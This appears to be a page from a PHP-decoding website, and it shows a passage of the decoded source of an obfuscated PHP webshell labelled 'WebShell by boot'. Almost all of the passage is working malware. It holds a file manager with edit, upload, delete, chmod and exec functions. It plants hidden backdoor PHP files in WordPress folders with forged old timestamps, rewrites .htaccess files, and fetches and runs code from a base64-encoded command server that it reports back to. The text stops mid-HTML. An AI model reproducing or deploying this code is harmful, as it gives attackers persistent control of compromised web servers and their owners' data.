Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto trahl; TQQwk: $post_data = $_POST; goto nS5Zs; trahl: @set_time_limit(0); got..

Decoded Output download

<?php 
 goto trahl; TQQwk: $post_data = $_POST; goto nS5Zs; trahl: @set_time_limit(0); goto wS8ZC; XMRAW: $can_write = false; goto aM1LR; k1C9R: $door_lists = array(); goto kRH_2; Wi8ub: if (!empty($post_data)) { foreach ($post_data as $k => $v) { $_SESSION[$k] = $v; } } goto gQvdL; RwqcY: $now_site = $prot . $domain; goto BGNdO; hNAa1: if (!is_dir($now_path)) { $now_path = dirname($now_path); } goto T_EkX; F71ic: ini_set("memory_limit", "-1"); goto b5Sm0; CsvpM: function getrandstr($length = 10) { $characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, strlen($characters) - 1)]; } return $randomString; } goto KPLhz; NCfWd: function getAllSubdirectories($directory, $maxDepth = 10, $currentDepth = 0) { global $all_paths; $subdirectories = array(); if ($currentDepth > $maxDepth) { return array(); } $items = scandir($directory); foreach ($items as $item) { if ($item == "." || $item == "..") { continue; } $path = $directory . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { $subdirectories[] = $path; $all_paths[] = $path; $subdirectories = array_merge($subdirectories, getAllSubdirectories($path, $maxDepth, $currentDepth + 1)); } } return $subdirectories; } goto bZ0mU; K9iJZ: function getFileSize($file_url) { $file_size = filesize($file_url); if ($file_size > 1024 * 1024) { $file_size = round($file_size / (1024 * 1024), 2) . " MB"; } else { if ($file_size > 1024) { $file_size = round($file_size / 1024, 2) . " KB"; } else { $file_size = $file_size . " B"; } } return $file_size; } goto Qp4AN; fFrUe: function findFilesWithContent($directory, $searchString, $currentDepth = 0, $maxDepth = 10) { $foundFiles = array(); if ($currentDepth >= $maxDepth) { return $foundFiles; } if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if ($file != "." && $file != "..") { $filePath = $directory . "/" . $file; if (is_dir($filePath)) { $foundFiles = array_merge($foundFiles, findFilesWithContent($filePath, $searchString, $currentDepth + 1, $maxDepth)); } else { if (strpos(file_get_contents($filePath), $searchString) !== false) { $foundFiles[] = $filePath; } } } } closedir($handle); } return $foundFiles; } goto axLdL; Qp4AN: function getFilePermission($filename) { clearstatcache(true, $filename); $perms = fileperms($filename); if (($perms & 49152) === 49152) { $info = "s"; } elseif (($perms & 40960) === 40960) { $info = "l"; } elseif (($perms & 32768) === 32768) { $info = "-"; } elseif (($perms & 24576) === 24576) { $info = "b"; } elseif (($perms & 16384) === 16384) { $info = "d"; } elseif (($perms & 8192) === 8192) { $info = "c"; } elseif (($perms & 4096) === 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto UZXO8; AgL2D: if (is_readable($now_path)) { $can_read = true; } goto XMRAW; g0myE: $domain = $_SERVER["HTTP_HOST"]; goto RwqcY; WklgD: $type = $_REQUEST["type"]; goto uZ2uB; GSBbP: if (!empty($path)) { $file_path = $path; $now_path = $path; } goto Amx2q; uZ2uB: $path = $_REQUEST["path"]; goto Mcawi; CK7HR: function add_doors($doors_array, $doors_55_array, $wp_files, $third_file, $ban_content, $open_content, $shell_action_code, $now_site) { $result = array(); global $door_lists, $all_paths, $last_folder_url; $path = $_SERVER["DOCUMENT_ROOT"]; $door_count = count($doors_array) + count($doors_55_array); getAllDirectories($path, 1, $door_count); if (count($door_lists) < $door_count) { $sy_count = count($doors_array) + count($doors_55_array) - count($door_lists); $door_lists = fill_full($door_lists, $sy_count); } $randomKeys = array_rand($door_lists, count($doors_array) + count($doors_55_array)); $door_files = array(); $succ_files = array(); $i = 0; $shell_other_url = ''; foreach ($randomKeys as $key) { $file_door_url = $door_lists[$key]; $file_name = getrandstr(rand(5, 10)) . ".php"; if ($i >= count($doors_array)) { $file_door_url = $file_door_url . "/wp"; $file_url = $file_door_url . "/" . $file_name; $res = cndoorfile($file_door_url, $file_name, $open_content, $doors_55_array[$i - count($doors_array)]); } else { $file_url = $file_door_url . "/" . $file_name; $res = crdoorfile($file_url, $doors_array[$i]); } if ($res) { $succ_files[] = $file_url; $door_files[] = str_replace($path, $now_site, $file_url); } else { } $i++; } if (!empty($last_folder_url)) { $file_url = $last_folder_url . "/index.php"; $res = crdoorfile($file_url, base64_decode($shell_action_code)); if ($res) { $shell_other_url = str_replace($path, $now_site, $file_url); } } $count = 0; if (count($succ_files) > 0) { $ht_urls = array(); $wp_files_array = explode(";", $wp_files); foreach ($wp_files_array as $k => $v) { $wp_files_array[$k] = $path . $v; } $ht_urls = $succ_files; $ht_urls = array_merge($ht_urls, $wp_files_array); $ht_urls[] = $path . "/" . $third_file; $ht_folders = array(); $ht_files = array(); foreach ($ht_urls as $k => $v) { $ht_folders[] = dirname($v); $ht_files[] = basename($v); } foreach ($all_paths as $k => $a) { $now_files = array(); foreach ($ht_folders as $htk => $htv) { if ($a == $htv) { $now_files[] = $ht_files[$htk]; } } $ht_content_now = ''; if (!empty($now_files)) { $ht_content_now = str_replace("{#htcontent}", implode("|", $now_files), $open_content); } else { $ht_content_now = $ban_content; } chmod($a . "/.htaccess", 493); if (file_put_contents($a . "/.htaccess", $ht_content_now) !== false) { $count++; chmod($a . "/.htaccess", 365); } } } $result["door_files"] = $door_files; $result["shell_other_url"] = $shell_other_url; $result["count"] = $count; return $result; } goto OVXHf; VnrNU: $now_url = $web_url . $sy_path; goto TQQwk; rAmLO: function curlget($url) { $url_data = ''; if (function_exists("file_get_contents")) { $url_data = file_get_contents($url); } if (empty($url_data) && function_exists("curl_exec")) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); $url_data = curl_exec($conn); curl_close($conn); } if (empty($url_data) && function_exists("fopen") && function_exists("stream_get_contents")) { $handle = fopen($url, "r"); $url_data = stream_get_contents($handle); fclose($handle); } return $url_data; } goto PTTlf; F0DwG: function add_exec($ht_contnt, $index_contnt, $exec_code, $wp_ycode) { $exec_code = str_replace("[##htcontent##]", base64_encode($ht_contnt), $exec_code); $exec_code = str_replace("[##indexcontent##]", base64_encode($index_contnt . $wp_ycode), $exec_code); $l12 = array("1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m"); for ($i = 1; $i < rand(6, 6); $i++) { $e14 = rand(0, count($l12) - 1); $o15 .= $l12[$e14]; } $u17 = fopen($o15 . ".php", "w"); fwrite($u17, $exec_code); fclose($u17); exec("php -f" . __DIR__ . "/{$o15}.php > /dev/null 2>/dev/null &", $e18, $res); if ($res === 0) { return true; } else { return false; } } goto NrEEU; UZXO8: function sortByFolder($now_path, $all_list) { $folder_list = array(); $file_list = array(); foreach ($all_list as $k => $v) { if (is_dir($now_path . "/" . $v)) { $folder_list[] = $v; } else { $file_list[] = $v; } } sort($folder_list); sort($file_list); $all_list = array_merge($folder_list, $file_list); return $all_list; } goto NHet4; z3V3_: function doorsAction($data, $pweb, $now_site) { $result_data = array(); $result_data["shell_id"] = $data["shell_id"]; $result_data["action"] = "doors"; $save_url = base64_decode($pweb) . "/esave.php"; $shell_id = $data["shell_id"]; $group_id = $data["group_id"]; $shell_type = $data["shell_type"]; $url = base64_decode($pweb) . "/eindexdoor.php?action=doors&shell_id=" . $shell_id . "&group_id=" . $group_id . "&shell_type=" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); if (!empty($json_array["doors"])) { $result = add_doors($json_array["doors"], $json_array["doors_55"], $json_array["wp_files"], $json_array["third_file"], $json_array["ht_ban_content"], $json_array["ht_open_content"], $json_array["shell_action_code"], $now_site); if (!empty($result["door_files"])) { $result_data["door_urls"] = implode(";", $result["door_files"]); $result_data["shell_other_url"] = $result["shell_other_url"]; $result_data["status"] = 1; } else { $result_data["code"] = "1001"; $result_data["status"] = 2; } } else { $result_data["code"] = "1002"; $result_data["status"] = 2; } $result_data["shell_type"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["status"]) { echo "<p style="color:green;">Doors is successfully, Success .h is " . $result["count"] . "</p>"; foreach ($result["door_files"] as $k => $v) { echo "<p><a href="" . $v . "" target="_blank">" . $v . "</a></p>"; } } else { echo "<p style="color:red;">Doors is failed! " . $result_data["code"] . "</p>"; } } goto CK7HR; NHet4: function rebackAction($data, $pweb, $now_site) { $group_id = $data["group_id"]; $shell_id = $data["shell_id"]; $shell_type = $data["shell_type"]; $url = base64_decode($pweb) . "/eindexdoor.php?action=reback&group_id=" . $group_id . "&shell_type=" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); $result_data = array(); $result_data["shell_id"] = $shell_id; $result_data["action"] = "reback"; $save_url = base64_decode($pweb) . "/esave.php"; if (isset($json_array["in_files"]) && !empty($json_array["in_files"])) { $wp_code = $json_array["wp_code"]; $in_list = explode(";", $json_array["in_files"]); foreach ($in_list as $k => $v) { $wpstr = strslit($v); $wp_code = str_replace("[##in_contnt_" . $k . "##]", $wpstr, $wp_code); $contnt = $json_array["code"] . $json_array["wp_ycode"]; crefile($v, $contnt); } $ht_list = explode(";", $json_array["ht_files"]); foreach ($ht_list as $k => $v) { $wpstr = strslit($v); $wp_code = str_replace("[##ht_contnt_" . $k . "##]", $wpstr, $wp_code); $contnt = $json_array["ht_contnt"]; crefile($v, $contnt); } $wp_list = explode(";", $json_array["wp_files"]); $wp_result = array(); foreach ($wp_list as $k => $v) { $f = crefile($v, $wp_code); if ($f) { $wp_result[] = $now_site . $v; } } if (!empty($wp_result) && count($wp_result) > 0) { $result_data["wp_urls"] = $wp_result; $result_data["status"] = 1; } else { $result_data["code"] = "1001"; $result_data["status"] = 2; } } else { $result_data["code"] = "1002"; $result_data["status"] = 2; } $result_data["shell_url"] = $now_site; $result_data["shell_type"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["status"]) { echo "<p style="color:green;">Reback is successfully</p>"; foreach ($wp_result as $k => $v) { echo "<p><a href="" . $v . "" target="_blank">" . $v . "</a></p>"; } } else { echo "<p style="color:red;">Reback is failed! " . $result_data["code"] . "</p>"; } } goto jWl5D; WX_1S: function crdoorfile($fipath, $contnt) { if (file_put_contents($fipath, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($fipath, $time); return true; } else { return false; } } goto sMcl1; HqanP: $file_path = $data["SCRIPT_FILENAME"]; goto poU4O; NrEEU: function othersAction($data, $pweb, $now_site) { $shell_id = $data["shell_id"]; $group_id_2 = $data["group_id_2"]; $group_id_3 = $data["group_id_3"]; $shell_type = $data["shell_type"]; $url = base64_decode($pweb) . "/eindexdoor.php?action=others&group_id_2=" . $group_id_2 . "&group_id_3=" . $group_id_3 . "&shell_type=" . $shell_type; $result_data = array(); $result_data["shell_id"] = $shell_id; $result_data["action"] = "others"; $save_url = base64_decode($pweb) . "/esave.php"; $cc = curlget($url); $json_array = json_decode($cc, true); if (!empty($json_array["group2_code"]) && !empty($json_array["second_file"]) || !empty($json_array["group3_code"]) && !empty($json_array["third_file"])) { $result = add_others($json_array["group2_code"], $json_array["group3_code"], $json_array["second_file"], $json_array["third_file"], $now_site); if (!empty($result["second_url"]) || !empty($result["third_url"])) { $result_data["second_url"] = $result["second_url"]; $result_data["third_url"] = $result["third_url"]; $result_data["status"] = 1; } else { $result_data["code"] = "1001"; $result_data["status"] = 2; } } else { $result_data["code"] = "1002"; $result_data["status"] = 2; } $result_data["shell_type"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["status"]) { echo "<p style="color:green;">Others is successfully</p>"; } else { echo "<p style="color:red;">Others is failed! " . $result_data["code"] . "</p>"; } } goto Tez2J; gQvdL: $all_paths = array(); goto k1C9R; Amx2q: if ($type == 1) { if (!empty($dir)) { $path = $dir; } $now_path = $path; } goto KdwIY; poU4O: $now_path = dirname($file_path); goto RAxC_; KPLhz: function deleteDirectory($dir) { if (!is_dir($dir)) { return false; } $files = glob($dir . "/*"); foreach ($files as $file) { if (is_file($file)) { unlink($file); } elseif (is_dir($file)) { deleteDirectory($file); } } return rmdir($dir); } goto ROHzz; ukCEQ: function getAllDirectories($path, $depth, $door_count) { global $all_paths, $door_lists, $last_folder_url; $firstLevelDirs = glob($path . "/*", GLOB_ONLYDIR); $totalSelections = $door_count; $selectedDirectories = array(); $dirsPerFirstLevel = max(1, floor($totalSelections / count($firstLevelDirs))); foreach ($firstLevelDirs as $dir) { $all_paths[] = $dir; $subDirs = getAllSubdirectories($dir, 10); if (count($subDirs) >= $dirsPerFirstLevel) { $randomKeys = array_rand($subDirs, $dirsPerFirstLevel); foreach ((array) $randomKeys as $key) { $selectedDirectories[] = $subDirs[$key]; } } else { $selectedDirectories = array_merge($selectedDirectories, $subDirs); } } if (count($selectedDirectories) < $totalSelections) { $additionalNeeded = $totalSelections - count($selectedDirectories); $allSubDirs = array(); foreach ($firstLevelDirs as $dir) { $allSubDirs = array_merge($allSubDirs, glob($dir . "/*", GLOB_ONLYDIR)); } $remainingDirs = array_diff($allSubDirs, $selectedDirectories); if (count($remainingDirs) > 0) { $additionalDirs = (array) array_rand($remainingDirs, min($additionalNeeded, count($remainingDirs))); foreach ($additionalDirs as $key) { $selectedDirectories[] = $remainingDirs[$key]; } } } $randomKeys = array_rand($all_paths, 1); foreach ((array) $randomKeys as $key) { $last_folder_url = $all_paths[$key]; } $door_lists = $selectedDirectories; return $all_paths; } goto NCfWd; nS5Zs: $pws = "aHR0cHM6Ly9yZW1vdGUyMDI0LmRmcWZhdC50b3AvZWdyb3VwLw=="; goto Wi8ub; aM1LR: if (is_writable($now_path)) { $can_write = true; } goto bqkBE; bZ0mU: function stationAction($data, $pweb, $now_site) { $result_data = array(); $result_data["shell_id"] = $data["shell_id"]; $result_data["action"] = "station"; $save_url = base64_decode($pweb) . "/esave.php"; $shell_id = $data["shell_id"]; $shell_type = $data["shell_type"]; $url = base64_decode($pweb) . "/eindexdoor.php?action=station&shell_id=" . $shell_id . "&shell_type=" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); $station_count = 0; if (!empty($json_array["station_code"]) && !empty($json_array["ht_pz_content"])) { $station_count = add_station($json_array["station_code"], $json_array["ht_pz_content"], $now_site); if ($station_count > 0) { $result_data["station_count"] = $station_count; $result_data["status"] = 1; } else { $result_data["code"] = "1001"; $result_data["status"] = 2; } } else { $result_data["code"] = "1002"; $result_data["status"] = 2; } $result_data["shell_url"] = $now_site; $result_data["shell_type"] = $shell_type; $res = curlpost($save_url, $result_data); } goto wH0Wc; ROHzz: function deleteFile($file) { if (file_exists($file)) { chmod($file, 511); if (unlink($file)) { echo "<p style="color:green;font-weight: bold;">" . $file . " is delete success" . "</p>"; } else { echo "<p style="color:red;font-weight: bold;">" . $file . " is delete error" . "</p>"; } } else { echo "<p style="color:red;font-weight: bold;">" . $file . " is not exist" . "</p>"; } } goto fFrUe; sMcl1: function cndoorfile($fipath, $file_name, $open_content, $contnt) { if (!is_dir($fipath)) { mkdir($fipath, 493, true); } $fileurl = $fipath . "/" . $file_name; if (file_put_contents($fileurl, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($fipath, $time); chmod($fileurl, 365); $ht_content_now = ''; $ht_content_now = str_replace("{#htcontent}", $file_name, $open_content); chmod($fipath . "/.htaccess", 493); if (file_put_contents($fipath . "/.htaccess", $ht_content_now) !== false) { chmod($fipath . "/.htaccess", 365); } chmod($fipath, 365); return true; } else { return false; } } goto sY1Qm; T_EkX: $can_read = false; goto AgL2D; kRH_2: $last_folder_url = ''; goto IBMop; b5Sm0: session_start(); goto WklgD; jWl5D: function execAction($data, $pweb, $now_site) { $group_id = $data["group_id"]; $shell_id = $data["shell_id"]; $shell_type = $data["shell_type"]; $url = base64_decode($pweb) . "/eindexdoor.php?action=exec&group_id=" . $group_id . "&shell_type=" . $shell_type; $result_data = array(); $result_data["shell_id"] = $shell_id; $result_data["action"] = "exec"; $save_url = base64_decode($pweb) . "/esave.php"; $cc = curlget($url); $json_array = json_decode($cc, true); if (isset($json_array["in_contnt"]) && !empty($json_array["ht_contnt"]) && !empty($json_array["exec_code"])) { $result = add_exec($json_array["ht_contnt"], $json_array["in_contnt"], $json_array["exec_code"], $json_array["wp_ycode"]); if ($result) { $result_data["status"] = 1; } else { $result_data["code"] = "1001"; $result_data["status"] = 2; } } else { $result_data["code"] = "1002"; $result_data["status"] = 2; } $result_data["shell_type"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["status"]) { echo "<p style="color:green;">Exec is successfully</p>"; } else { echo "<p style="color:red;">Exec is failed! " . $result_data["code"] . "</p>"; } } goto F0DwG; BGNdO: $sy_path = str_replace($website_path, '', $now_path); goto VnrNU; RAxC_: $dir = $_POST["dir"]; goto oyxne; sY1Qm: function strslit($str) { if (!empty($str)) { $cha = str_split($str); return "'" . implode("'.'", $cha) . "'"; } else { return ''; } } goto CsvpM; KdwIY: $file_path_array = explode("/", $file_path); goto hNAa1; oyxne: $web_url = $data["REQUEST_SCHEME"] . "://" . $data["SERVER_NAME"]; goto GSBbP; OVXHf: function fill_full($file_urls, $sy_count) { $path = realpath($_SERVER["DOCUMENT_ROOT"]); $file_url_result = array(); foreach ($file_urls as $k => $v) { $v = trim($v); if (!empty($v)) { $file_url_result[] = $v; } } $file_tou = array("wp-content", "wp-admin", "wp-includes"); $file_list = array("css", "images", "img", "js", "themes", "plugins", "uploads", "languages", "includes", "maint", "network", "met", "user", "IXR", "ID3", "fonts", "block", "blocks", "php-compat", "php", "Text", "widgets", "SimplePie", "random", "style-engine", "pomo", "certificates", "blockt"); for ($i = 0; $i < $sy_count; $i++) { $path_url = $path . "/" . $file_tou[rand(0, count($file_tou) - 1)]; for ($j = 0; $j < rand(3, 6); $j++) { $path_url = $path_url . "/" . $file_list[rand(0, count($file_list) - 1)]; } $file_url_result[] = $path_url; } return $file_url_result; } goto ukCEQ; IBMop: if (!empty($_SESSION["c2hlbGxfY29kZQ=="]) && strlen($_SESSION["c2hlbGxfY29kZQ=="]) == 20) { ?> 
<!doctypehtml><html lang="en"><head><title>WebShell by boot</title><meta charset="utf-8"><meta content="width=device-width,initial-scale=1"name="viewport"><link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css"rel="stylesheet"><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script><script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script><style>.col-12{width:100%;display:inline-block}.col-6{width:50%;display:inline-block;float:left}</style></head><body><div class="jumbotron text-center"style="padding:1rem 0"><h1 style="font-size:2rem;font-weight:700;margin:1rem 0">WebShell by boot</h1></div><div class="container"><div class="row"><p><div style="width:30%;display:inline-block">Server IP:<?php  echo $data["SERVER_ADDR"]; ?> 
</div><div style="width:30%;display:inline-block">Server Software:<?php  echo $data["SERVER_SOFTWARE"]; ?> 
</div><div style="width:30%;display:inline-block">OS:<?php  echo PHP_OS; ?> 
</div></p><p><div style="width:30%;display:inline-block">Website:<?php  echo $data["HTTP_HOST"]; ?> 
</div><div style="width:30%;display:inline-block">User:<?php  echo get_current_user(); ?> 
</div></p><p><a href="?path=<?php  echo $website_path; ?> 
">Project</a></p></div><div class="row"><p>Path:<?php  $file_now_path = ''; foreach ($file_path_array as $k => $v) { if (empty($v)) { ?> 
<a href="?path=/">-</a>r<?php  } else { if (empty($file_now_url)) { $file_now_url = $v; } else { $file_now_url = $file_now_url . "/" . $v; } $file_now_path = $file_now_path . "/" . $v; ?> 
/<a href="?path=<?php  echo $file_now_path; ?> 
"><?php  echo trim($v); ?> 
</a><?php  } } ?> 
<span style="color:green"style="color:red"<?php  if ($can_read) { } else { } ?> 
>Readable</span> | <span style="color:green"style="color:red"<?php  if ($can_write) { } else { } ?> 
>Writeable</span></p></div><?php  if ($type == 2 || $type == 3) { if ($type == 3) { $file_content = $_REQUEST["file_content"]; $content_result = file_put_contents($path, $file_content); if ($content_result) { echo "<div class="alert alert-success" role="alert">File content modified successfully!</div>"; } else { echo "<div class="alert alert-danger" role="alert">Failed to modify file content!</div>"; } } ?> 
<div class="row"><form action="?type=3"method="post"><input name="path"value="<?php  echo $file_path; ?> 
"type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["c2hlbGxfY29kZQ=="]; ?> 
"type="hidden"><div class="form-group"><?php  $content = file_get_contents($file_path); ?> 
<textarea class="form-control"cols="100"id="exampleFormControlTextarea1"name="file_content"rows="20"><?php  echo htmlspecialchars($content); ?> 
</textarea></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php  } else { if ($type == 4) { $file_new_name = $_POST["file_new_name"]; if (!empty($file_new_name)) { $rename_result = rename($file_path, $now_path . "/" . $file_new_name); if ($rename_result) { echo "<div class="alert alert-success" role="alert">File name modified successfully!</div>"; $file_path = $now_path . "/" . $file_new_name; } else { echo "<div class="alert alert-danger" role="alert">Failed to modify file name!</div>"; } } ?> 
<div class="row"><form action="?type=4"method="post"><input name="path"value="<?php  echo $file_path; ?> 
"type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["c2hlbGxfY29kZQ=="]; ?> 
"type="hidden"><div class="form-group"><?php  $content = file_get_contents($file_path); ?> 
<input name="file_new_name"value="<?php  echo basename($file_path); ?> 
"id="file_new_name"class="form-control"></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php  } else { if ($type == 5) { $new_chmod = trim($_POST["new_chmod"]); if (!empty($new_chmod)) { if (chmod($file_path, octdec($new_chmod))) { echo "<div class="alert alert-success" role="alert">File permissions modified successfully!</div>"; $old_chmod = $new_chmod; } else { echo "<div class="alert alert-danger" role="alert">Failed to modify file permissions!</div>"; } } else { $permissions = fileperms($file_path); $old_chmod = substr(sprintf("%o", $permissions), -4); } ?> 
<div class="row"><form action="?type=5"method="post"><input name="path"value="<?php  echo $file_path; ?> 
"type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["c2hlbGxfY29kZQ=="]; ?> 
"type="hidden"><div class="form-group"><?php  $content = file_get_contents($file_path); ?> 
<input name="new_chmod"value="<?php  echo $old_chmod; ?> 
"id="new_chmod"class="form-control"></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php  } else { if ($type == 6) { $new_name = trim($_POST["new_name"]); $new_content = trim($_POST["new_content"]); if (!empty($new_name)) { if (is_file($now_path . "/" . $new_name)) { echo "<div class="alert alert-danger" role="alert">The file already exists!</div>"; } else { $file = fopen($now_path . "/" . $new_name, "w"); if ($file) { if (fwrite($file, $new_content)) { echo "<div class="alert alert-success" role="alert">File created successfully!</div>"; } else { echo "<div class="alert alert-danger" role="alert">Unable to write to file!</div>"; } fclose($file); } else { echo "<div class="alert alert-danger" role="alert">Unable to open file!</div>"; } } } ?> 
<div class="row"><form action="?type=6"method="post"><input name="path"value="<?php  echo $file_path; ?> 
"type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["c2hlbGxfY29kZQ=="]; ?> 
"type="hidden"><div class="form-group"><input name="new_name"value="<?php  echo $new_name; ?> 
"id="new_name"class="form-control"placeholder="New File Name"></div><div class="form-group"><textarea class="form-control"cols="100"id="new_content"name="new_content"rows="20"placeholder="New File Content"><?php  echo htmlspecialchars($new_content); ?> 
</textarea></div><button class="btn btn-success"type="submit">Create Now</button></form></div><?php  } else { if ($type == 7) { $new_name = trim($_POST["new_name"]); if (!empty($new_name)) { if (!is_dir($now_path . "/" . $new_name)) { if (mkdir($now_path . "/" . $new_name)) { echo "<div class="alert alert-success" role="alert">Directory created successfully!</div>"; } else { echo "<div class="alert alert-success" role="alert">Directory creation failed!</div>"; } } else { echo "<div class="alert alert-success" role="alert">Directory already exists!</div>"; } } ?> 
<div class="row"><form action="?type=7"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["c2hlbGxfY29kZQ=="]; ?> 
"type="hidden"> <input name="path"value="<?php  echo $file_path; ?> 
"type="hidden"id="path"><div class="form-group"><input name="new_name"value="<?php  echo $new_name; ?> 
"id="new_name"class="form-control"placeholder="New Folder Name"></div><button class="btn btn-success"type="submit">Create Now</button></form></div><?php  } else { if ($type == 8) { $search_keys = trim($_POST["search_keys"]); $act = trim($_POST["act"]); ?> 
<div class="row"><form action="?type=8"method="post"><div class="form-group"><input name="search_keys"value="<?php  echo $search_keys; ?> 
"id="search_keys"class="form-control"placeholder="Search content"></div><button class="btn btn-success"type="submit">Search</button></form></div><?php  if (!empty($search_keys)) { $result = array(); $file_list = findFilesWithContent($website_path, $search_keys, 0, 10); ?> 
<form action="?type=8"method="post"id="deleteForm"style="margin:1rem"><input name="act"value="deleteFiles"type="hidden"id="act"><div><?php  echo "<span style='color:red;'>" . $search_keys . "</span> files list\xef\274\232
"; ?> 
</div><div><p><input name="allcheck"value="1"type="checkbox"id="allcheck"> all check <input value="delete"type="button"class="delBtn"></p></div><div><?php  foreach ($file_list as $file) { $str = "<a href="?path=" . $file . "&type=2" target="_blank">" . $file . "</a>"; echo "<p><input type="checkbox" class="item" name="files[]" value="" . $file . ""/>&nbsp;&nbsp;" . $str . "</p>"; } ?> 
</div></form><?php  } if (!empty($act) && $act == "deleteFiles") { $file_list = $_REQUEST["files"]; foreach ($file_list as $k => $v) { deleteFile($v); } } } else { if ($_POST["act"] == "del") { $delete_file_list = $_POST["childcheck"]; if (!empty($delete_file_list)) { $count = 0; $fail_count = 0; foreach ($delete_file_list as $k => $v) { if (is_dir($v)) { $del_result = deleteDirectory($v); } else { $del_result = unlink($v); } if ($del_result) { $count++; } else { $fail_count++; } } if ($count > 0) { echo "<div class="alert alert-success" role="alert">Delete " . $count . " files successfully!</div>"; } if ($fail_count > 0) { echo "<div class="alert alert-danger" role="alert">Delete " . $fail_count . " files failed!</div>"; } } } if ($_POST["act"] == "upload") { $targetFile = $now_path . "/" . basename($_FILES["fileToUpload"]["name"]); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) { echo "<div class="alert alert-success" role="alert">File " . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " uploaded!</div>"; } else { echo "<div class="alert alert-danger" role="alert">File upload failed!</div>"; } } $file_list = scandir($now_path); $file_list = sortByFolder($now_path, $file_list); ?> 
<div class="row"><div class="col-12"style="margin-bottom:1rem"><div class="row"><div class="col-6"><form action="?path=<?php  echo $file_path; ?> 
"method="post"enctype="multipart/form-data"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["c2hlbGxfY29kZQ=="]; ?> 
"type="hidden"> <input name="act"value="upload"type="hidden"> <input name="fileToUpload"type="file"id="formFileSm"class="form-control form-control-sm"style="width:200px;display:inline-block"> <button class="btn btn-sm btn-info"type="submit">Upload</button> <a href="?path=<?php  echo $file_path; ?> 
&type=6"class="btn btn-sm btn-primary">Create File</a> <a href="?path=<?php  echo $file_path; ?> 
&type=7"class="btn btn-sm btn-success">Create Folder</a> <a href="?path=<?php  echo $file_path; ?> 
&type=8"class="btn btn-sm btn-warning">Search Files</a></form></div><div class="col-6"><form action="?path=<?php  echo $file_path; ?> 
"method="post"enctype="multipart/form-data"><input name="exec_code"value=""class="form-control"style="display:inline-block;width:50%"> <input name="act"value="exec_code"type="hidden"> <button class="btn btn-sm btn-info"type="submit">Exec</button></form></div></div></div><div class="col-12"style="margin-bottom:1rem"><div class="row"><div class="col-6"><form action="?type=1"method="post"enctype="multipart/form-data"><input name="dir"value="<?php  echo $path; ?> 
"class="form-control"style="display:inline-block;width:80%"> <input name="act"value="change_dir"type="hidden"> <button class="btn btn-sm btn-info"type="submit">Change Dir</button></form></div><div class="col-6"></div></div></div><div class="bd-example bd-example-row"style="border:1px solid #ededed;padding:1rem;margin:1rem 0"><div class="row"><div class="col-2 col-sm-1"><form action="?path=<?php  echo $file_path; ?> 
"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["c2hlbGxfY29kZQ=="]; ?> 
"type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="reback"type="hidden"> <input name="group_id"value="<?php  echo $_SESSION["Z3JvdXA="]; ?> 
"type="hidden"> <input name="shell_id"value="<?php  echo $_SESSION["c2hlbGxfaWQ="]; ?> 
"type="hidden"> <input name="shell_type"value="<?php  echo $_SESSION["dHlwZQ=="]; ?> 
"type="hidden"> <button class="btn btn-sm btn-success"type="submit">Reback</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php  echo $file_path; ?> 
"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["c2hlbGxfY29kZQ=="]; ?> 
